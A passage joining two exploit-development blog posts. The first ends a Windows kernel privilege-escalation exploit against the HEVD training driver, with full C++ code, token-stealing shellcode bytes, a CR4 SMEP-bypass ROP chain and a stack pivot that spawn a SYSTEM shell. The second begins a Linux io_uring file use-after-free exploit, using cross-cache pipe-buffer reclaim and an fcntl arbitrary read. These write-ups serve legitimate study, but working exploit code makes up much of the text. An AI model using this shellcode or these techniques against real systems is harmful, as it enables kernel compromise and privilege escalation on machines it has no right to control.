std::cout << "[+] MOV_CR4_RCX: 0x" << std::hex << MOV_CR4_RCX << std::endl << std::endl;
/*
kd> u nt!KeFlushCurrentTbImmediately+0x17
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`515a5fc7 0f22e1 mov cr4,rcx
fffff800`515a5fca c3 ret
kd> ? fffff800`515a5fc7 - fffff800`51200000
Evaluate expression: 3825607 = 00000000`003a5fc7
*/
return TRUE;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}

int main() {
SMEPBypassInitializer();
exploit();
return 0;
}

After the exploit executes, we have the following WinDBG output:

[CALL]ing the pre-calculated address in order to change the current RSP value to 0x48000000 (user-controlled)
A segmentation fault popped out after the mov esp, 0x48000000 execution
Analysis of the segmentation fault error

After the mov esp, 0x48000000 instruction executes, we notice that it crashed and raised an exception named UNEXPECTED_KERNEL_MODE_TRAP (7F). Now let's look at our stack.

Stack frame after crash

So, what can we do next?

Memory and Components

Now this blog post can really start. After all this briefing covering the techniques, it's time to explain why the stack is one of the most confusing things in exploit development, and how it can easily turn a simple vulnerability into a brain-melting issue.

Kernel Memory Management

An oversimplification of how a kernel connects application software to the hardware of a computer (wikipedia)

Now we have to go deep into the memory management topic in order to understand concepts such as memory segments, virtual allocation, and paging.

According to Wikipedia

The kernel has full access to the system’s memory and must allow processes to safely access this memory as they require it. Often the first step in doing this is virtual addressing, usually achieved by paging and/or segmentation. Virtual addressing allows the kernel to make a given physical address appear to be another address, the virtual address.
<…snip…>
In computing, a virtual address space (VAS) or address space is the set of ranges of virtual addresses that an operating system makes available to a process.[1] The range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computer’s instruction set architecture and supported by the operating system’s pointer size implementation, which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. This provides several benefits, one of which is security through process isolation assuming each process is given a separate address space.

As we can see, virtual addressing refers to the address space given to each user application and to kernel functions, reserving memory ranges while the OS is in use. When an application is started, the operating system understands that it needs to allocate new memory for it, assigning a valid range of addresses and consequently avoiding damage to the kernel's current memory region.

That's what happens when you launch a game and, for some reason, several gigabytes of your memory get consumed before the game even starts: the space was allocated up front, and most of that data and those addresses start out zeroed until the game's file data begins to be loaded into memory.

With functions such as malloc() and VirtualAlloc(), you can actually map a range of virtual memory at a chosen address; that is why stack pivoting is the best way to make this exploit work.
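
For example, here is a minimal sketch of requesting a specific user-land address with VirtualAlloc(), the same pattern the exploit uses later for its fake stack at 0x48000000 (the address and size are just the values used in this post, and the snippet reuses the includes from the exploit above).

// Asking VirtualAlloc for a specific address: if the region is free, the
// returned pointer equals the requested address; otherwise the call fails
// (it does not silently relocate when an explicit lpAddress is passed).
LPVOID RequestFixedRegion() {
    LPVOID p = VirtualAlloc((LPVOID)0x48000000, 0x10000,
                            MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (p == nullptr) {
        std::cout << "[-] 0x48000000 is not available in this process" << std::endl;
    }
    return p;
}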

Virtual Memory

Address difference betwen physical/virtual memory

As you can see in the image above, virtual addresses are what the application/process actually works with, so the process can query, allocate, or free its data at any time.

As Wikipedia says:

In computing, virtual memory, or virtual storage,[b] is a memory management technique that provides an “idealized abstraction of the storage resources that are actually available on a given machine”[3] which “creates the illusion to users of a very large (main) memory”.[4]
The computer’s operating system, using a combination of hardware and software, maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory.[5] Address translation hardware in the CPU, often referred to as a Memory Management Unit (MMU), automatically translates virtual addresses to physical addresses. Software within the operating system may extend these capabilities, utilizing, e.g., disk storage, to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physically present in the computer.
The primary benefits of virtual memory include freeing applications from having to manage a shared memory space, ability to share memory used by libraries between processes, increased security due to memory isolation, and being able to conceptually use more memory than might be physically available, using the technique of paging or segmentation.

As mentioned before, addressing/allocating virtual memory ranges (from a user-land perspective) allows us to manage how addresses and data are used in our application, but there is a catch: when a range of virtual memory is allocated, it is not yet part of the OS's physical operations, because the allocation is only an abstraction. Following our earlier example, when a game starts, virtual memory is allocated and the Memory Management Unit (MMU) automatically translates data between physical and virtual addresses.

From a developer's perspective, when an application consumes memory it is important to free()/VirtualFree() unused data so that it does not crash the whole application once too many addresses are marked as in use by the system. The OS can also deal with processes that consume too many addresses, automatically terminating them to avoid critical errors. There are cases where applications exceed the amount of free RAM; in those situations the allocation can be extended onto disk storage.

Paged Memory

Physical memory, here also referred to as paged memory, is the memory that is actually in use by applications and processes. This memory scheme retrieves data from virtual allocations and uses that data as part of the current execution.

According to Wikipedia:

Memory Paging

In computer operating systems, memory paging (or swapping on some Unix-like systems) is a memory management scheme by which a computer stores and retrieves data from secondary storage[a] for use in main memory.[citation needed] In this scheme, the operating system retrieves data from secondary storage in same-size blocks called pages. Paging is an important part of virtual memory implementations in modern operating systems, using secondary storage to let programs exceed the size of available physical memory.

Page faults

When a process tries to reference a page not currently mapped to a page frame in RAM, the processor treats this invalid memory reference as a page fault and transfers control from the program to the operating system.

Page Table

A page table is the data structure used by a virtual memory system in a computer operating system to store the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the Random-Access Memory (RAM) subsystem. The page table is a key component of virtual address translation that is necessary to access data in memory.

The kernel can identify whether an address is backed by physical memory by consulting its Page Table Entry (PTE), which distinguishes each type of allocation and maps memory segments.

Using the Page Table Entry (PTE), the kernel can map the correct offset in order to translate each address. If a translation hits an invalidly mapped memory region, a page fault is raised and the OS crashes; in the Windows kernel a _KTRAP_FRAME is built, and an error like the one below should be expected:

Stack Frame after exploit execution

Virtual Allocation issues in Windows System

When a binary exploit is developed, memory has to be manipulated in most cases. Using C/C++ functions such as VirtualAlloc(), if you allocate data at address 0x48000000 with size 0x1000, the range 0x48000000-0x48001000 is now recorded in the page table as a virtual address, but it will NOT yet be treated as physical memory by the kernel (it is not resident until touched). It is important to pay attention to this detail: if you try to use the example above from a kernel-land perspective, a trap frame will be handled by WinDBG as follows:

Trying to use Virtual Memory in Kernel scheme cause _KTRAP_FRAME

To deal with this issue, we can use the VirtualLock() function from C/C++, since it locks the specified region of the process's virtual address space into physical memory, thereby preventing page faults. With that in mind, we can now turn our virtual memory address into a physical one.

Now it should be possible to achieve code execution, right?

<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Mapping address to Physical Memory <------------
if (VirtualLock(fakeStack, 0x10000)) {
std::cout << "[+] Address Mapped to Physical Memory" << std::endl;
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
Calling our Stack Pivoting gadget
Exception from WinDBG
Again another UNEXPECTED_KERNEL_MODE_TRAP (7f)

Again, the same error popped out even with the address mapped into physical memory.

Pain and Suffering due to Double Faults

After millions of tests with different memory allocation patterns, I found a candidate solution. According to Martin Mielke and kristal-g, some reserved memory space must exist just below the main allocation at address 0x48000000.

Kristal-G explanation about the cause of DoubleFault Exception
0x47fffff70 address being used by StackFrame

When a trap frame occurs, we can clearly see that addresses just below 0x48000000 are used by the stack, and if those addresses remain unallocated they cannot be used by the current stack frame.

As you can see, 0x47fffff70 is being used by our stack frame, but since we start the allocation at address 0x48000000, it is not a valid address. To deal with this issue, memory must be reserved just below 0x48000000.

<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000-0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
<...snip...>

Now the allocation actually starts at address 0x48000000 - 0x1000, finally allowing us to avoid the DoubleFault exception.

Let's run our exploit again; it should work!

Again….
The trap frame at 0x47fffff70 disappeared after the memory allocation

No matter how you try to manage memory, changing addresses or filling up the stack with data and hoping for the best, something is always caught and an exception is returned even when your code seems correct. It took me about 3 months of rebooting my VM and changing code to understand why this kept happening.

Stack vs DATA

Let's imagine the stack frame as a big ball pit holding a bunch of data: when a new ball is placed into the pit, all the others shift position. That is exactly what happens when you manipulate memory by swapping the current stack for another one, as mov esp, 0x48000000 does. When the current stack frame is replaced, the kernel "believes" the underlying physical memory is mapped to other processes, and you can actually see things like this after the crash.

<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Reserved memory before Stack Pivoting
*(INT64*)(0x48000000 - 0x1000) = 0xDEADBEEFDEADBEEF;
*(INT64*)(0x48000000 - 0x900) = 0xDEADBEEFDEADBEEF;

QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
Crash after mov esp, 0x48000000

After polluting the reserved space below the stack pivot offset, we can clearly see that different addresses popped up in our current stack frame, but our trap frame still remains at 0x47fffe70 as before. If we fill the whole region with 0x41 bytes, we notice that some of those bytes show up as different values, as below:

<...snip...>
// Filling up reserved space memory
RtlFillMemory((LPVOID)(0x48000000 - 0x1000), 0x1000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
0x41 bytes from our reserved memory space show up in the stack frame

With these results in mind, we have a couple of alternatives to consider:

  • Increase the size of the reserved memory space.
  • Try to fix the stack frame itself, given that we apparently cannot reserve enough memory below the stack pivot address.

So let's first try to increase the size of our reserved memory.

<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x5000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Filling up reserved space memory
// Size increased to 0x5000
RtlFillMemory((LPVOID)(0x48000000 - 0x5000), 0x5000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
mov esp, 0x48000000 no longer raises an error, and our RIP register is forwarded to add esp, 0x28
After that, a DoubleFault exception was caught due to add esp, 0x28
svchost.exe crashed when add esp, 0x28 executed

For some reason, after increasing our reserved memory below mov esp, 0x48000000, the whole kernel crashed; when 0x48000000 is moved into the RSP register, our stack frame shifts into the context of other user processes because of the address itself. That is why I mentioned earlier that the stack sometimes behaves like a ball pit, and in the end we are still getting the same trap frame exception.

No matter how you try to manipulate memory, it always gets caught and crashes some application; after that, WinDBG handles it as an exception and BSODs your system like a terrible horror movie.

My experience trying everything I had to get past this exception

Breakpoints??…. ooohh!…. Breakpoints!!!!

INT3, a.k.a. 0xCC, is the breakpoint instruction: a signal for any debugger to catch and stop execution of an attached process or of code under development. It can be triggered by clicking a debug option in an IDE, or by inserting the INT3 instruction directly into the target process via the 0xCC opcode. In the WinDBG command line, the bp command is available to set breakpoints on addresses, as follows:

// Common Breakpoint, just stop into this address before it runs
bp 0x48000000

// Conditional breakpoint: stop when the r12 register is not equal to 0x1337
// if not equal, set r12 to 0x1337
// if equal, copy the r13 value into r12
bp 0x48000000 ".if( @r12 != 0x1337) { r12=1337 }.else { r12=r13 }"

etc...

It is also possible to use this mechanism to breakpoint a shellcode and check whether the code is running correctly during the exploit development phase.

BYTE sc[256] = {
0xcc, // <--- We send a debbuger signal and stop it execution
// before code execution
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff
};

According to Wikipedia:

The INT3 instruction is a one-byte-instruction defined for use by debuggers to temporarily replace an instruction in a running program in order to set a code breakpoint. The more general INT XXh instructions are encoded using two bytes. This makes them unsuitable for use in patching instructions (which can be one byte long); see SIGTRAP.
The opcode for INT3 is 0xCC, as opposed to the opcode for INT immediate8, which is 0xCD immediate8. Since the dedicated 0xCC opcode has some desired special properties for debugging, which are not shared by the normal two-byte opcode for an INT3, assemblers do not normally generate the generic 0xCD 0x03 opcode from mnemonics.

After this explanation of breakpoints, it is important to note that every previous test was run with breakpoints in place while developing the exploit; now it is time to drop them and remove every INT3 instruction.

Let's try re-running our exploit without breakpointing anything.

cmd.exe opens and no crashes are caught

The kernel no longer crashes, and system memory stays intact!

Now the shellcode is executed after our SMEP bypass through the ROP chain, and we are able to spawn an NT AUTHORITY\SYSTEM shell.

YES!! VICTORY!!

BAAAM!! Finally!!!! An NT AUTHORITY\SYSTEM shell after all!

Breakpoints…. HAHA!! BREAKPOINTS!

So now we can appreciate that breakpoints themselves can also be a dangerous thing in exploit development.

The explanation for this issue is actually simple. When the WinDBG debugger catches an exception from the kernel, the operating system gets a signal that something went wrong; but when you are manipulating the stack, everything you do looks like an exception. The operating system does not understand that "an attacker is trying to manipulate the stack": it just catches the fault and reboots, because the stack no longer matches the current kernel context.

This headache is similar to Structured Exception Handling (SEH) vulnerabilities, where setting breakpoints, or even just attaching a debugger to a process, can cause crashes or render it unusable.

In my case, the way past the exception was to remove all breakpoints and let the kernel continue without rebooting on a non-critical exception.

Final Considerations

Writing this blog post, I learned a lot of things I did not know before I started. It was a fun and extremely technical experience (especially for me); it took me 2 days to write about something that cost me 3 months! It should take you about 10 minutes to read, which is awesome and makes me happy too!

It is important to note that most of this blog post is really a deep dive into memory itself, trying to show how, as attackers, we can improve the way we deal with obstacles, looking at every possibility that can help us achieve our goal, in this case an NT AUTHORITY\SYSTEM shell.

Beware of the stack and of breakpoints; these things can be a headache sometimes, and you will NEVER know until you think about changing your attack methodology.

Thanks to the people who helped me along all this way:

  • First of all, thanks to my husband, who held me together when I was stressed, with no clue what to do, and with a lot of nightmares throughout these months!
  • @xct_de
  • @gal_kristal
  • @33y0re

Hope you enjoyed!

Exploit Link (not so important at all)

References

Escaping the Google kCTF Container with a Data-Only Exploit

By: h0mbre
29 July 2023 at 04:00

Introduction

I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_uring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwhile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge; if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.

The Bug

The bug is extremely simple (why can’t I find one like this?) and was exploited in kCTF in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.

I won’t go into the bug very much because it wasn’t really important to the exercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (refcount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING request which, upon completion, will erroneously decrement the refcount (refcount == 1), and then finally, call io_uring_unregister_files which ends up decrementing the refcount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.

What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for discrepancies between those routines.

Giant Shoulders

It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke down in exquisite detail how to coerce the Linux kernel to free an entire page of file objects back to the page allocator by utilizing a technique called “cross-cache”. file structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the struct file size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.

Instead of using this trick of getting our entire victim page of file objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my experience. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.
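
For reference, the reclaim itself boils down to a single full-page write to a pipe once the victim page has gone back to the page allocator (a sketch; the full exploit at the end of the post wraps this in create_pipe(), write_pipe(), and reset_pipe_buf()):

int pfd[2];
unsigned char page[4096];

pipe(pfd);

// A 4096-byte write makes the kernel grab a fresh page to back the pipe
// buffer, ideally the victim page we just freed via cross-cache
memset(page, 'A', sizeof(page));
write(pfd[1], page, sizeof(page));

// Draining the pipe lets us rewrite (and inspect) the whole page later
read(pfd[0], page, sizeof(page));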

Arbitrary Read

The first thing I started to look for, was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl syscall in fs/fcntl.c. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an fd as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f for the function copy_to_user. This seemed like a relatively logical way to find a method of leaking data back to userspace.

The copy_to_user function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.

Now if you go to the source code and do the find on copy_to_user, the 2nd result is a snippet in this bit right here:

static long fcntl_rw_hint(struct file *file, unsigned int cmd,
			  unsigned long arg)
{
	struct inode *inode = file_inode(file);
	u64 __user *argp = (u64 __user *)arg;
	enum rw_hint hint;
	u64 h;

	switch (cmd) {
	case F_GET_RW_HINT:
		h = inode->i_write_hint;
		if (copy_to_user(argp, &h, sizeof(*argp)))
			return -EFAULT;
		return 0;
	case F_SET_RW_HINT:
		if (copy_from_user(&h, argp, sizeof(h)))
			return -EFAULT;
		hint = (enum rw_hint) h;
		if (!rw_hint_valid(hint))
			return -EINVAL;

		inode_lock(inode);
		inode->i_write_hint = hint;
		inode_unlock(inode);
		return 0;
	default:
		return -EINVAL;
	}
}

You can see that in the F_GET_RW_HINT case, a u64 (“h”) is copied back to userspace. That value comes from the value of inode->i_write_hint. And inode itself is returned from file_inode(file). The source code for that function is as follows:

static inline struct inode *file_inode(const struct file *f)
{
	return f->f_inode;
}

Lol, well then. If we control the file, then we control the inode as well. A struct file looks like this:

struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
<SNIP>

And since we’re using the pipe buffer as our replacement object (really the entire page), we can set inode to be an arbitrary address. Let’s go check out the inode struct and see what we can learn about this i_write_hint member.

struct inode {
	umode_t			i_mode;
	unsigned short		i_opflags;
	kuid_t			i_uid;
	kgid_t			i_gid;
	unsigned int		i_flags;

#ifdef CONFIG_FS_POSIX_ACL
	struct posix_acl	*i_acl;
	struct posix_acl	*i_default_acl;
#endif

	const struct inode_operations	*i_op;
	struct super_block	*i_sb;
	struct address_space	*i_mapping;

#ifdef CONFIG_SECURITY
	void			*i_security;
#endif

	/* Stat data, not accessed from path walking */
	unsigned long		i_ino;
	/*
	 * Filesystems may only read i_nlink directly.  They shall use the
	 * following functions for modification:
	 *
	 *    (set|clear|inc|drop)_nlink
	 *    inode_(inc|dec)_link_count
	 */
	union {
		const unsigned int i_nlink;
		unsigned int __i_nlink;
	};
	dev_t			i_rdev;
	loff_t			i_size;
	struct timespec64	i_atime;
	struct timespec64	i_mtime;
	struct timespec64	i_ctime;
	spinlock_t		i_lock;	/* i_blocks, i_bytes, maybe i_size */
	unsigned short          i_bytes;
	u8			i_blkbits;
	u8			i_write_hint;
<SNIP>

So i_write_hint is a u8, aka a single byte. This is perfect for what we need: inode becomes the address from which we read a byte back to userland (plus the offset to the member).

Since we control 100% of the backing data of the file, we thus control the value of the inode member. So if we set up a fake file struct in memory via our pipe buffer and have the inode member be 0x1337, the kernel will try to deref 0x1337 as an address and then read a byte at the offset of the i_write_hint member. So this is an arbitrary read for us, and we found it in the dumbest way possible.
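
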